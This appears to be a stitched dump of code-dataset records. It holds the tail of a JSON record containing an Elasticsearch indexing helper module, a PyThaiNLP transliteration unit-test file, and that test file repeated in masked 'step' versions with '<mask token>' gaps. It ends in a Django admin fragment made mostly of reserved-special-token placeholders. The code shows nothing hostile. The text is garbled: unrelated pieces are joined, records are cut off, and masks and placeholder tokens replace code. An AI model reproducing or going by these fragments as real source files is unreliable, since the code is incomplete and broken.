{index}')\n return indexed\n",
"step-5": "from elasticsearch import Elasticsearch, helpers\n\nfrom bso.server.main.config import ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK, ES_URL\nfrom bso.server.main.decorator import exception_handler\nfrom bso.server.main.logger import get_logger\n\nclient = None\nlogger = get_logger(__name__)\n\n\n@exception_handler\ndef get_client():\n global client\n if client is None:\n client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK))\n return client\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(\n index=index,\n body={\"query\": {\"bool\": {\"filter\": [{'terms': {'doi.keyword': dois}}]}}, \"fields\": ['doi'], \"size\": len(dois),\n \"_source\": False},\n request_timeout=60*5\n )\n existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(\n index=index,\n request_cache=False,\n body={\"query\": {\"bool\": {\"filter\": [{'term': {'doi.keyword': doi}}]}}, \"fields\": ['doi'], \"_source\": True},\n request_timeout=60*5\n )\n existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois')\n body = {\n \"script\": {\n \"lang\": \"painless\",\n \"refresh\": True,\n \"conflicts\": \"proceed\",\n \"inline\": \"if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations =\"\n \" new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);\"\n \"ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct()\"\n \".sorted().collect(Collectors.toList())\",\n \"params\": {\"local_affiliations\": local_affiliations}\n },\n \"query\": {\n \"bool\": {\n \"filter\": [{\n \"terms\": {\n \"doi.keyword\": current_dois\n }\n }]\n }\n }\n }\n es.update_by_query(index=index, body=body, request_timeout=60*5)\n\n\n@exception_handler\ndef delete_index(index: str) -> None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n@exception_handler\ndef update_alias(alias: str, old_index: str, new_index: str) -> None:\n es = get_client()\n logger.debug(f'updating alias {alias} from {old_index} to {new_index}')\n response = es.indices.update_aliases({\n 'actions': [\n {'remove': {'index': old_index, 'alias': alias}},\n {'add': {'index': new_index, 'alias': alias}}\n ]\n })\n logger.debug(response)\n\ndef get_analyzers() -> dict:\n return {\n 'light': {\n 'tokenizer': 'icu_tokenizer',\n 'filter': [\n 'lowercase',\n 'french_elision',\n 'icu_folding'\n ]\n }\n }\n\ndef get_filters() -> dict:\n return {\n 'french_elision': {\n 'type': 'elision',\n 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu', 'quoiqu', 'lorsqu', 'puisqu']\n }\n }\n\n@exception_handler\ndef reset_index(index: str) -> None:\n es = get_client()\n delete_index(index)\n \n settings = {\n 'analysis': {\n 'filter': get_filters(),\n 'analyzer': get_analyzers()\n }\n }\n \n dynamic_match = None\n if 'bso-publications' in index:\n # dynamic_match = \"*oa_locations\"\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = \"*authors\"\n\n mappings = { 'properties': {} }\n # attention l'analyzer .keyword ne sera pas présent pour ce champs !\n for f in ['title', 'affiliations.name', 'authors.first_name', 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = { \n 'type': 'text',\n 'analyzer': 'light' \n }\n\n if dynamic_match:\n mappings[\"dynamic_templates\"] = [\n {\n \"objects\": {\n \"match\": dynamic_match,\n \"match_mapping_type\": \"object\",\n \"mapping\": {\n \"type\": \"nested\"\n }\n }\n }\n ]\n response = es.indices.create(\n index=index,\n body={'settings': settings, 'mappings': mappings},\n ignore=400 # ignore 400 already exists code\n )\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) -> list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions, chunk_size=500, request_timeout=60,\n raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-ids": [
7,
8,
9,
11,
13
]
}
|
[
7,
8,
9,
11,
13
] |
# -*- coding: utf-8 -*-
import unittest
import torch
from pythainlp.transliterate import romanize, transliterate, pronunciate, puan
from pythainlp.transliterate.ipa import trans_list, xsampa_list
from pythainlp.transliterate.thai2rom import ThaiTransliterator
from pythainlp.corpus import remove
_BASIC_TESTS = {
None: "",
"": "",
"abc": "abc",
"หมอก": "mok",
"หาย": "hai",
"แมว": "maeo",
"เดือน": "duean",
"ดำ": "dam",
"ดู": "du",
"บัว": "bua",
"กก": "kok",
"พร": "phon",
"กร": "kon",
"กรร": "kan",
"กรรม": "kam",
# "กรม": "krom", # failed
"ฝ้าย": "fai",
"นพพร": "nopphon",
"อัก": "ak",
# "ทีปกร": "thipakon", # failed
# "ธรรพ์": "than", # failed
# "ธรรม": "tham", # failed
# "มหา": "maha", # failed
# "หยาก": "yak", # failed
# "อยาก": "yak", # failed
# "ยมก": "yamok", # failed
# "กลัว": "klua", # failed
# "บ้านไร่": "banrai", # failed
# "ชารินทร์": "charin", # failed
}
# these are set of two-syllable words,
# to test if the transliteration/romanization is consistent, say
# romanize(1+2) = romanize(1) + romanize(2)
_CONSISTENCY_TESTS = [
# ("กระจก", "กระ", "จก"), # failed
# ("ระเบิด", "ระ", "เบิด"), # failed
# ("หยากไย่", "หยาก", "ไย่"), # failed
("ตากใบ", "ตาก", "ใบ"),
# ("จัดสรร", "จัด", "สรร"), # failed
]
class TestTransliteratePackage(unittest.TestCase):
def test_romanize(self):
self.assertEqual(romanize(None), "")
self.assertEqual(romanize(""), "")
self.assertEqual(romanize("แมว"), "maeo")
self.assertEqual(romanize("แมว", engine="tltk"), "maeo")
def test_romanize_royin_basic(self):
for word in _BASIC_TESTS:
expect = _BASIC_TESTS[word]
self.assertEqual(romanize(word, engine="royin"), expect)
def test_romanize_royin_consistency(self):
for word, part1, part2 in _CONSISTENCY_TESTS:
self.assertEqual(
romanize(word, engine="royin"),
(
romanize(part1, engine="royin")
+ romanize(part2, engine="royin")
),
)
def test_romanize_thai2rom(self):
self.assertEqual(romanize("แมว", engine="thai2rom"), "maeo")
self.assertEqual(romanize("บ้านไร่", engine="thai2rom"), "banrai")
self.assertEqual(romanize("สุนัข", engine="thai2rom"), "sunak")
self.assertEqual(romanize("นก", engine="thai2rom"), "nok")
self.assertEqual(romanize("ความอิ่ม", engine="thai2rom"), "khwam-im")
self.assertEqual(
romanize("กานต์ ณรงค์", engine="thai2rom"), "kan narong"
)
self.assertEqual(romanize("สกุนต์", engine="thai2rom"), "sakun")
self.assertEqual(romanize("ชารินทร์", engine="thai2rom"), "charin")
def test_thai2rom_prepare_sequence(self):
transliterater = ThaiTransliterator()
UNK_TOKEN = 1 # UNK_TOKEN or <UNK> is represented by 1
END_TOKEN = 3 # END_TOKEN or <end> is represented by 3
self.assertListEqual(
transliterater._prepare_sequence_in("A")
.cpu()
.detach()
.numpy()
.tolist(),
torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)
.cpu()
.detach()
.numpy()
.tolist(),
)
self.assertListEqual(
transliterater._prepare_sequence_in("♥")
.cpu()
.detach()
.numpy()
.tolist(),
torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)
.cpu()
.detach()
.numpy()
.tolist(),
)
self.assertNotEqual(
transliterater._prepare_sequence_in("ก")
.cpu()
.detach()
.numpy()
.tolist(),
torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)
.cpu()
.detach()
.numpy()
.tolist(),
)
def test_transliterate(self):
self.assertEqual(transliterate(""), "")
self.assertEqual(transliterate("แมว", "pyicu"), "mæw")
self.assertEqual(transliterate("คน", engine="ipa"), "kʰon")
self.assertIsNotNone(transliterate("คน", engine="thaig2p"))
self.assertIsNotNone(transliterate("แมว", engine="thaig2p"))
self.assertIsNotNone(transliterate("คน", engine="tltk_g2p"))
self.assertIsNotNone(transliterate("แมว", engine="tltk_g2p"))
self.assertIsNotNone(transliterate("คน", engine="tltk_ipa"))
self.assertIsNotNone(transliterate("แมว", engine="tltk_ipa"))
self.assertIsNotNone(trans_list("คน"))
self.assertIsNotNone(xsampa_list("คน"))
def test_pronunciate(self):
self.assertEqual(pronunciate(""), "")
remove("thai_w2p")
self.assertIsNotNone(pronunciate("คน", engine="w2p"))
self.assertIsNotNone(pronunciate("แมว", engine="w2p"))
self.assertIsNotNone(pronunciate("มข.", engine="w2p"))
self.assertIsNotNone(pronunciate("มช.", engine="w2p"))
self.assertIsNotNone(pronunciate("jks", engine="w2p"))
def test_puan(self):
self.assertEqual(puan("นาริน"), "นิน-รา")
self.assertEqual(puan("นาริน", False), "นินรา")
self.assertEqual(puan("แสงดีนะ"), "แสง-ดะ-นี")
self.assertEqual(puan("แสงดีนะ", False), "แสงดะนี")
with self.assertRaises(ValueError):
self.assertEqual(puan("สวัสดีครับ"), "สวัสดีครับ")
|
normal
|
{
"blob_id": "486cfc4bb4b46d78715b11cba44656e8ba077c9b",
"index": 2551,
"step-1": "<mask token>\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n <mask token>\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n <mask token>\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n <mask token>\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n\n def test_transliterate(self):\n self.assertEqual(transliterate(''), '')\n self.assertEqual(transliterate('แมว', 'pyicu'), 'mæw')\n self.assertEqual(transliterate('คน', engine='ipa'), 'kʰon')\n self.assertIsNotNone(transliterate('คน', engine='thaig2p'))\n self.assertIsNotNone(transliterate('แมว', engine='thaig2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_ipa'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_ipa'))\n self.assertIsNotNone(trans_list('คน'))\n self.assertIsNotNone(xsampa_list('คน'))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n\n def test_puan(self):\n self.assertEqual(puan('นาริน'), 'นิน-รา')\n self.assertEqual(puan('นาริน', False), 'นินรา')\n self.assertEqual(puan('แสงดีนะ'), 'แสง-ดะ-นี')\n self.assertEqual(puan('แสงดีนะ', False), 'แสงดะนี')\n with self.assertRaises(ValueError):\n self.assertEqual(puan('สวัสดีครับ'), 'สวัสดีครับ')\n",
"step-3": "<mask token>\n_BASIC_TESTS = {None: '', '': '', 'abc': 'abc', 'หมอก': 'mok', 'หาย': 'hai',\n 'แมว': 'maeo', 'เดือน': 'duean', 'ดำ': 'dam', 'ดู': 'du', 'บัว': 'bua',\n 'กก': 'kok', 'พร': 'phon', 'กร': 'kon', 'กรร': 'kan', 'กรรม': 'kam',\n 'ฝ้าย': 'fai', 'นพพร': 'nopphon', 'อัก': 'ak'}\n_CONSISTENCY_TESTS = [('ตากใบ', 'ตาก', 'ใบ')]\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n\n def test_romanize(self):\n self.assertEqual(romanize(None), '')\n self.assertEqual(romanize(''), '')\n self.assertEqual(romanize('แมว'), 'maeo')\n self.assertEqual(romanize('แมว', engine='tltk'), 'maeo')\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n\n def test_transliterate(self):\n self.assertEqual(transliterate(''), '')\n self.assertEqual(transliterate('แมว', 'pyicu'), 'mæw')\n self.assertEqual(transliterate('คน', engine='ipa'), 'kʰon')\n self.assertIsNotNone(transliterate('คน', engine='thaig2p'))\n self.assertIsNotNone(transliterate('แมว', engine='thaig2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_ipa'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_ipa'))\n self.assertIsNotNone(trans_list('คน'))\n self.assertIsNotNone(xsampa_list('คน'))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n\n def test_puan(self):\n self.assertEqual(puan('นาริน'), 'นิน-รา')\n self.assertEqual(puan('นาริน', False), 'นินรา')\n self.assertEqual(puan('แสงดีนะ'), 'แสง-ดะ-นี')\n self.assertEqual(puan('แสงดีนะ', False), 'แสงดะนี')\n with self.assertRaises(ValueError):\n self.assertEqual(puan('สวัสดีครับ'), 'สวัสดีครับ')\n",
"step-4": "import unittest\nimport torch\nfrom pythainlp.transliterate import romanize, transliterate, pronunciate, puan\nfrom pythainlp.transliterate.ipa import trans_list, xsampa_list\nfrom pythainlp.transliterate.thai2rom import ThaiTransliterator\nfrom pythainlp.corpus import remove\n_BASIC_TESTS = {None: '', '': '', 'abc': 'abc', 'หมอก': 'mok', 'หาย': 'hai',\n 'แมว': 'maeo', 'เดือน': 'duean', 'ดำ': 'dam', 'ดู': 'du', 'บัว': 'bua',\n 'กก': 'kok', 'พร': 'phon', 'กร': 'kon', 'กรร': 'kan', 'กรรม': 'kam',\n 'ฝ้าย': 'fai', 'นพพร': 'nopphon', 'อัก': 'ak'}\n_CONSISTENCY_TESTS = [('ตากใบ', 'ตาก', 'ใบ')]\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n\n def test_romanize(self):\n self.assertEqual(romanize(None), '')\n self.assertEqual(romanize(''), '')\n self.assertEqual(romanize('แมว'), 'maeo')\n self.assertEqual(romanize('แมว', engine='tltk'), 'maeo')\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n\n def test_transliterate(self):\n self.assertEqual(transliterate(''), '')\n self.assertEqual(transliterate('แมว', 'pyicu'), 'mæw')\n self.assertEqual(transliterate('คน', engine='ipa'), 'kʰon')\n self.assertIsNotNone(transliterate('คน', engine='thaig2p'))\n self.assertIsNotNone(transliterate('แมว', engine='thaig2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_ipa'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_ipa'))\n self.assertIsNotNone(trans_list('คน'))\n self.assertIsNotNone(xsampa_list('คน'))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n\n def test_puan(self):\n self.assertEqual(puan('นาริน'), 'นิน-รา')\n self.assertEqual(puan('นาริน', False), 'นินรา')\n self.assertEqual(puan('แสงดีนะ'), 'แสง-ดะ-นี')\n self.assertEqual(puan('แสงดีนะ', False), 'แสงดะนี')\n with self.assertRaises(ValueError):\n self.assertEqual(puan('สวัสดีครับ'), 'สวัสดีครับ')\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport unittest\n\nimport torch\nfrom pythainlp.transliterate import romanize, transliterate, pronunciate, puan\nfrom pythainlp.transliterate.ipa import trans_list, xsampa_list\nfrom pythainlp.transliterate.thai2rom import ThaiTransliterator\nfrom pythainlp.corpus import remove\n\n_BASIC_TESTS = {\n None: \"\",\n \"\": \"\",\n \"abc\": \"abc\",\n \"หมอก\": \"mok\",\n \"หาย\": \"hai\",\n \"แมว\": \"maeo\",\n \"เดือน\": \"duean\",\n \"ดำ\": \"dam\",\n \"ดู\": \"du\",\n \"บัว\": \"bua\",\n \"กก\": \"kok\",\n \"พร\": \"phon\",\n \"กร\": \"kon\",\n \"กรร\": \"kan\",\n \"กรรม\": \"kam\",\n # \"กรม\": \"krom\", # failed\n \"ฝ้าย\": \"fai\",\n \"นพพร\": \"nopphon\",\n \"อัก\": \"ak\",\n # \"ทีปกร\": \"thipakon\", # failed\n # \"ธรรพ์\": \"than\", # failed\n # \"ธรรม\": \"tham\", # failed\n # \"มหา\": \"maha\", # failed\n # \"หยาก\": \"yak\", # failed\n # \"อยาก\": \"yak\", # failed\n # \"ยมก\": \"yamok\", # failed\n # \"กลัว\": \"klua\", # failed\n # \"บ้านไร่\": \"banrai\", # failed\n # \"ชารินทร์\": \"charin\", # failed\n}\n\n# these are set of two-syllable words,\n# to test if the transliteration/romanization is consistent, say\n# romanize(1+2) = romanize(1) + romanize(2)\n_CONSISTENCY_TESTS = [\n # (\"กระจก\", \"กระ\", \"จก\"), # failed\n # (\"ระเบิด\", \"ระ\", \"เบิด\"), # failed\n # (\"หยากไย่\", \"หยาก\", \"ไย่\"), # failed\n (\"ตากใบ\", \"ตาก\", \"ใบ\"),\n # (\"จัดสรร\", \"จัด\", \"สรร\"), # failed\n]\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n def test_romanize(self):\n self.assertEqual(romanize(None), \"\")\n self.assertEqual(romanize(\"\"), \"\")\n self.assertEqual(romanize(\"แมว\"), \"maeo\")\n self.assertEqual(romanize(\"แมว\", engine=\"tltk\"), \"maeo\")\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine=\"royin\"), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(\n romanize(word, engine=\"royin\"),\n (\n romanize(part1, engine=\"royin\")\n + romanize(part2, engine=\"royin\")\n ),\n )\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize(\"แมว\", engine=\"thai2rom\"), \"maeo\")\n self.assertEqual(romanize(\"บ้านไร่\", engine=\"thai2rom\"), \"banrai\")\n self.assertEqual(romanize(\"สุนัข\", engine=\"thai2rom\"), \"sunak\")\n self.assertEqual(romanize(\"นก\", engine=\"thai2rom\"), \"nok\")\n self.assertEqual(romanize(\"ความอิ่ม\", engine=\"thai2rom\"), \"khwam-im\")\n self.assertEqual(\n romanize(\"กานต์ ณรงค์\", engine=\"thai2rom\"), \"kan narong\"\n )\n self.assertEqual(romanize(\"สกุนต์\", engine=\"thai2rom\"), \"sakun\")\n self.assertEqual(romanize(\"ชารินทร์\", engine=\"thai2rom\"), \"charin\")\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n\n UNK_TOKEN = 1 # UNK_TOKEN or <UNK> is represented by 1\n END_TOKEN = 3 # END_TOKEN or <end> is represented by 3\n\n self.assertListEqual(\n transliterater._prepare_sequence_in(\"A\")\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n )\n\n self.assertListEqual(\n transliterater._prepare_sequence_in(\"♥\")\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n )\n\n self.assertNotEqual(\n transliterater._prepare_sequence_in(\"ก\")\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n )\n\n def test_transliterate(self):\n self.assertEqual(transliterate(\"\"), \"\")\n self.assertEqual(transliterate(\"แมว\", \"pyicu\"), \"mæw\")\n self.assertEqual(transliterate(\"คน\", engine=\"ipa\"), \"kʰon\")\n self.assertIsNotNone(transliterate(\"คน\", engine=\"thaig2p\"))\n self.assertIsNotNone(transliterate(\"แมว\", engine=\"thaig2p\"))\n self.assertIsNotNone(transliterate(\"คน\", engine=\"tltk_g2p\"))\n self.assertIsNotNone(transliterate(\"แมว\", engine=\"tltk_g2p\"))\n self.assertIsNotNone(transliterate(\"คน\", engine=\"tltk_ipa\"))\n self.assertIsNotNone(transliterate(\"แมว\", engine=\"tltk_ipa\"))\n self.assertIsNotNone(trans_list(\"คน\"))\n self.assertIsNotNone(xsampa_list(\"คน\"))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(\"\"), \"\")\n remove(\"thai_w2p\")\n self.assertIsNotNone(pronunciate(\"คน\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"แมว\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"มข.\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"มช.\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"jks\", engine=\"w2p\"))\n\n def test_puan(self):\n self.assertEqual(puan(\"นาริน\"), \"นิน-รา\")\n self.assertEqual(puan(\"นาริน\", False), \"นินรา\")\n self.assertEqual(puan(\"แสงดีนะ\"), \"แสง-ดะ-นี\")\n self.assertEqual(puan(\"แสงดีนะ\", False), \"แสงดะนี\")\n with self.assertRaises(ValueError):\n self.assertEqual(puan(\"สวัสดีครับ\"), \"สวัสดีครับ\")\n",
"step-ids": [
6,
8,
10,
11,
12
]
}
|
[
6,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
class ParticipantAdmin(admin.ModelAdmin):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
